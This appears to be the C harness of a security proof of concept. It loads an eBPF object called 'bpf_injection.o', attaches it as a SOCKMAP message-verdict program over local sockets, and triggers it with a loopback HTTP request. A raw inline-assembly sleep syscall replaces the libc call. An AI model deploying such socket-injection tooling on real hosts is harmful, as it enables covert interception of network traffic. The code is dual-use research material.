#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <linux/bpf.h>
#include <sys/socket.h>
#include "sockmapBuild.h"
#include <time.h>
#include <errno.h>
#include <arpa/inet.h>
#include <unistd.h> 
#include <bpf/bpf.h>
#include <inttypes.h>
#include <bpf/libbpf.h>
#include "asm_exit.h"
#include "bpfO.h"
#include "pingC.h"
#include "load_bpf.h"
#include "map_check.h"
#include "elf_check.h"
#define FLAG_SLEEP 7
#define CORK_BUF_SIZE 100
#define BPF_TAG_SIZE 8


void sockC(const char *ipAddress, 
    int port)
{
    printf("\e[0;35m--------------------------------- [POC] ---------------------------------\e[0m\n");
    int sockMap = -1;
    printf("\e[0;33m[+] Check Version ip address (IPV4) : %s\e[0m\n", 
        ipAddress);
    struct sockaddr_in target;
    if (inet_pton(AF_INET, 
        ipAddress, 
        &target.sin_addr) != 1)
    {
        fprintf(stderr, 
            "\e[0;31m[-] Error ip address format (IPV4), Exit...\e[0m\n");
        asmE();
    }

    else 
    {
        printf("\e[0;34m[+] IP address format (IPV4) : %s\e[0m\n", 
            ipAddress);
    }
    if (flagPort) 
    {
        port = 80;
        printf("\e[0;34m[+] Default port : %d\e[0m\n", 
            80);
    } 
    else 
    {
        printf("\e[0;34m[+] Input port : %d\e[0m\n", 
            port);
    }
    int num1 = 0;
    int num2 = 0;
    int num3 = 0;
    int num4 = 0;
   if (sscanf(ipAddress, 
           "%d.%d.%d.%d", 
           &num1, 
           &num2, 
           &num3, 
           &num4) != 4)
    {
        fprintf(stderr, 
            "\e[0;31m[-] Error ip address format (IPV4), Exit...\e[0m\n");
        asmE();
    }
    else 
    {
        printf("\e[0;34m[+] IP address format (IPV4) : %s\e[0m\n", 
            ipAddress);
        if (num1 < 0 || num1 > 255 || num2 < 0 || num2 > 255 || num3 < 0 || num3 > 255 || num4 < 0 || num4 > 255)
        {
            fprintf(stderr, 
                "\e[0;31m[-] Error ip address Value !\e[0m\n");
            printf("\e[0;34m[+] Please enter correct ip address !\e[0m\n");
            asmE();
        }
        else 
        {
            printf("\e[0;34m[+] Correct IP address value (IPV4) : %s\e[0m\n", 
                ipAddress);
        }
    }
    if (runObjfile!= 0)
    {
        checkElf();
    }
    else 
    {
        printf("\e[0;31m[-] ARG CHECK OBJ FILE NOT DETECT (ARG = %d).\e[0m\n",
            runObjfile);
    }
    pingConnection(ipAddress);
    cFile();
    int listenFd = socket(AF_INET, SOCK_STREAM, 0);
    if (listenFd < 0) 
    { 
        perror("\e[0;31m[-] socket\e[0m"); 
        asmE(); 
    }
    printf("\e[0;34m[+] Create socket successfully (FD = %d)\e[0m\n", 
        listenFd);
    memset(&target, 0, sizeof(target));
    target.sin_family = AF_INET;
    target.sin_port = htons(port);
    target.sin_addr.s_addr = inet_addr(ipAddress);

    if (bind(listenFd, 
        (struct sockaddr *)&target, 
        sizeof(target)) < 0) 
    {
        perror("\e[0;31m[-] bind");
        close(listenFd); 
        asmE();
    }
    if (listen(listenFd, 5) < 0) 
    {
        perror("[-] listen");
        close(listenFd); 
        asmE();
    }
    printf("\e[0;36m[+] Listening on %s:%d\n", ipAddress, port);
    sockMap = bpf_map_create(BPF_MAP_TYPE_SOCKMAP, 
        NULL, 
        sizeof(__u32), 
        sizeof(__u32), 
        2, 
        NULL);
    if (sockMap < 0) 
    { 
        fprintf(stderr,
            "\e[0;31m[-] Error Create SOCKMAP : %s\e[0m\n", 
            strerror(errno)); 
        close(listenFd); asmE(); 
    }
    printf("\e[0;36m[+] Create SOCKMAP Success (fd=%d)\e[0m\n", 
        sockMap);

    int clientSock = socket(AF_INET, SOCK_STREAM, 0);
    if (clientSock < 0) 
    { 
        perror("\e[0;31m[-] client socket\e[0m"); 
        close(listenFd); 
        asmE(); 
    }
    struct sockaddr_in servAddr;
    memset(&servAddr,0,sizeof(servAddr));
    servAddr.sin_family = AF_INET;
    servAddr.sin_port = htons(port);
    if (inet_pton(AF_INET, ipAddress, &servAddr.sin_addr) != 1)
    { 
        perror("\e[0;31m[-] inet_pton\e[0m"); 
        close(listenFd); 
        close(clientSock); 
        asmE(); 
    }
    if (connect(clientSock, 
        (struct sockaddr *)&servAddr, 
        sizeof(servAddr)) < 0) 
    {
        perror("\e[0;31m[-] client connect\e[0m");
        close(listenFd); 
        close(clientSock); 
        asmE();
    }
    printf("\e[0;36m[+] Client connected (fd=%d)\e[0m\n", clientSock);

    struct sockaddr_in clientAccept;
    socklen_t clientLenAc = sizeof(clientAccept);
    int accV = accept(listenFd, 
        (struct sockaddr *)&clientAccept, 
        &clientLenAc);
    if (accV < 0) 
    { 
        fprintf(stderr,
            "\e[0;31m[-] Error : %s\n", 
            strerror(errno)); 
        close(listenFd); 
        close(clientSock); 
        asmE(); 
    }
    printf("\e[0;36m[+] Accept Connection Success. server_fd=%d\e[0m\n", 
        accV);

    struct bpf_object *obj = load_bpf_program_from_file("bpf_injection.o");
    if (!obj) 
    { 
        fprintf(stderr,"\e[0;31m[-] Error Load BPF object!\e[0m\n"); 
        close(accV); 
        close(clientSock); 
        close(listenFd); 
        asmE(); 
    }
    struct bpf_program *prog = bpf_object__next_program(obj, 
        NULL);
    if (!prog) 
    { 
        fprintf(stderr,
            "\e[0;31m[-] No BPF program found\e[0m\n"); 
        bpf_object__close(obj); 
        close(accV); 
        close(clientSock); 
        close(listenFd); 
        asmE(); 
    }
    int fdeBPF = bpf_program__fd(prog);
    int corkMap = bpf_object__find_map_fd_by_name(obj, 
        "cork_config_map");
    if (corkMap < 0) 
    { 
        fprintf(stderr,
            "\e[0;31m[-] Error get cork_config_map map fd : %s\e[0m\n", 
            strerror(errno)); 
        bpf_object__close(obj); 
        close(accV); 
        close(clientSock); 
        close(listenFd); 
        asmE(); 
    }
    printf("\e[0;35m[+] Get Info BPF Obj : ------------------------\e[0m\n");
    int retValue = 0;
    struct bpf_prog_info info;
    __u32 infoLen = sizeof(info);
    memset(&info, 
        0, 
        sizeof(info));
    const unsigned int max_map_ids = 64;
    __u32 *map_ids_buf = calloc(max_map_ids, 
        sizeof(__u32));
    if (!map_ids_buf)
    {
        perror("\e[0;31m[-] Calloc\e[0m");
        close(accV); 
        close(clientSock); 
        close(listenFd); 
        asmE();
    }
    info.nr_map_ids = max_map_ids;
    info.map_ids = (__aligned_u64)(uintptr_t)map_ids_buf;
    retValue = bpf_obj_get_info_by_fd(fdeBPF, 
        &info, 
        &infoLen);
    errno = 0;
    printf("\e[0;32m[DEBUG] bpf_obj_get_info_by_fd returned %d, info_len=%u, errno=%d\e[0m\n", 
        retValue, 
        infoLen, 
        errno);
    if (retValue)
    {
        printf("\e[0;31m[-] Error get information about the BPF object !\e[0m\n");
        printf("\e[0;31m[-] Error : %s\e[0m", 
            strerror(errno));
        
    }
    else 
    {
        printf("\e[0;36m[+] Get information about the BPF object Success.\e[0m\n");
    }
    if (info.type != 0 && info.id != 0)
    {
        printf("\e[0;36m[+] Not NULL struct bpf_prog_info.\e[0m\n");
        printf("[+] type: %u\n", 
            info.type);
        printf("[+] ID : %u\n", 
            info.id);
        for (int z = 0; z < BPF_TAG_SIZE; ++z)
        {
            printf("[+] Tag : %02x", info.tag[z]);
        }
        printf("\n");
        printf("[+] jited_prog_len: %u\n", 
            info.jited_prog_len);
        printf("[+] xlated_prog_len: %u\n", 
            info.xlated_prog_len);
        printf("[+] load_time (ns): %" PRIu64 "\n", 
            info.load_time);
        printf("[+] created_by_uid: %u\n", 
            info.created_by_uid);
        printf("[+] nr_map_ids (returned): %u\n", 
            info.nr_map_ids);
        char nameObj[BPF_OBJ_NAME_LEN + 1];
        memcpy(nameObj, 
            info.name, 
            BPF_OBJ_NAME_LEN);
        nameObj[BPF_OBJ_NAME_LEN] = '\0';
        printf("[+] name: %s\n", 
            nameObj);
        printf("[+] ifindex: %u\n", 
            info.ifindex);
        printf("[+] gpl_compatible: %u\n", 
            (unsigned)info.gpl_compatible);
        if (info.nr_map_ids > 0 && info.nr_map_ids <= max_map_ids) 
        {
            printf("[+] map ids:\n");
            for (unsigned int t = 0; t < info.nr_map_ids; ++t)
            {
                 printf("    - %u\n", map_ids_buf[t]);
            }
        }
        else if (info.nr_map_ids > max_map_ids) 
        {
            printf("\e[0;31m[-] Warning: buffer too small; kernel returned %u map ids, buffer was %u\e[0m\n",
                info.nr_map_ids, max_map_ids);
        } 
        else 
        {
            printf("[+] No map ids\n");
        }
        free(map_ids_buf);
    }
    else 
    {
        fprintf(stderr,
            "\e[0;31m[-] Null Value in struct bpf_prog_info !\e[0m\n");
        printf("\e[0;31m[-] Error : %s\e[0m\n", 
            strerror(errno));
        close(accV); 
        close(clientSock); 
        close(listenFd); 
        asmE();
    }
    __u32 k = 0;
    __u32 v = ( __u32 ) CORK_BUF_SIZE;
    if (bpf_map_update_elem(corkMap, &k, &v, BPF_ANY) < 0) 
    {
        fprintf(stderr,
            "\e[0;31m[-] Error update cork_config_map: %s\e[0m\n", 
            strerror(errno));
        bpf_object__close(obj); 
        close(accV); 
        close(clientSock); 
        close(listenFd); 
        asmE();
    }
    printf("\e[0;36m[+] cork_config_map updated (CORK_BUF_SIZE=%u, fd=%d)\e[0m\n", v, corkMap);
    __u32 key0 = 0, val0 = ( __u32 ) accV;
    __u32 key1 = 1, val1 = ( __u32 ) clientSock;
    if (bpf_map_update_elem(sockMap, &key0, &val0, BPF_ANY) < 0) 
    {
        fprintf(stderr,
            "\e[0;31m[-] Failed to update sockmap (server_fd=%u): %s\e[0m\n", 
            val0, 
            strerror(errno));
        bpf_object__close(obj); 
        close(accV); 
        close(clientSock); 
        close(listenFd); 
        asmE();
    }
    if (bpf_map_update_elem(sockMap, &key1, &val1, BPF_ANY) < 0) 
    {
        fprintf(stderr,
            "\e[0;31m[-] Failed to update sockmap (client_fd=%u): %s\e[0m\n", 
            val1, 
            strerror(errno));
        bpf_object__close(obj); 
        close(accV); 
        close(clientSock); 
        close(listenFd); 
        asmE();
    }
    printf("\e[0;36m[+] inserted server_fd=%u into sockmap at index=%u\e[0m\n", 
        val0, 
        key0);
    printf("\e[0;36m[+] inserted client_fd=%u into sockmap at index=%u\e[0m\n", 
        val1, 
        key1);
    if (bpf_prog_attach(fdeBPF, sockMap, BPF_SK_MSG_VERDICT, 0) != 0) 
    {
        fprintf(stderr,
            "\e[0;31m[-] Failed to attach eBPF prog: %s\e[0m\n", 
            strerror(errno));
        bpf_object__close(obj); 
        close(accV); 
        close(clientSock); 
        close(listenFd); 
        asmE();
    }
    printf("\e[0;36m[+] eBPF program attached (prog_fd=%d -> sockmap=%d)\e[0m\n", 
        fdeBPF, 
        sockMap);
    const char *req = "GET / HTTP/1.0\r\nHost: 127.0.0.1\r\n\r\n";
    ssize_t snt = send(clientSock, req, strlen(req), 0);
    if (snt < 0) 
    {
        fprintf(stderr, 
            "\e[0;31m[-] Error (SEND) : %s\e[0m\n", 
            strerror(errno));
        asmE();
    }
    else 
    {
        printf("\e[0;36m[+] Trigger: Sent %zd bytes. Check trace_pipe\e[0m\n",
             snt);
    }
     printf("\e[0;36m[+] Sleeping %d to allow BPF prints... Check trace_pipe!\e[0m\n",
        FLAG_SLEEP);
    long ret1; 
    errno = 0; 
    struct timespec rqtp, remL1;
    rqtp.tv_sec = FLAG_SLEEP;
    rqtp.tv_nsec = 0;
    register long r10R asm("r10");
    r10R = 0;
    __asm__ volatile
        (
            "syscall"
            : "=a"(ret1)
            : "a"(0xE6),
              "D"((long)0),
              "S"((long)0),
              "d"(&rqtp),
              "r"(r10R)
            : "rcx",
              "r11",
              "memory"
            );
    if (ret1 == 0)
    {
        printf("\e[0;34m[+] Sleep finished successfully.\e[0m\n");
    }
    else if (ret1 == -4)
    {
         printf("\e[0;31m[-] Sleep interrupted. Remaining time: %ld sec, %ld nsec\e[0m\n", 
            remL1.tv_sec, 
            remL1.tv_nsec);
    }
    else 
    {
        __asm__ volatile("nop");
    }
    if (flagCTr != 0)
    {
        printf("\e[0;32m[DEBUG] Start check tracing (Arg = %d).\e[0m\n",
            flagCTr);
        debugTracing();
    }
    else 
    {
        printf("\e[0;32m[DEBUG] Not Start check tracing (Arg = %d).\e[0m\n",
            flagCTr);
        
    }
    close(accV);
    close(clientSock);
    close(listenFd);
    close(sockMap);
    bpf_object__close(obj);
}
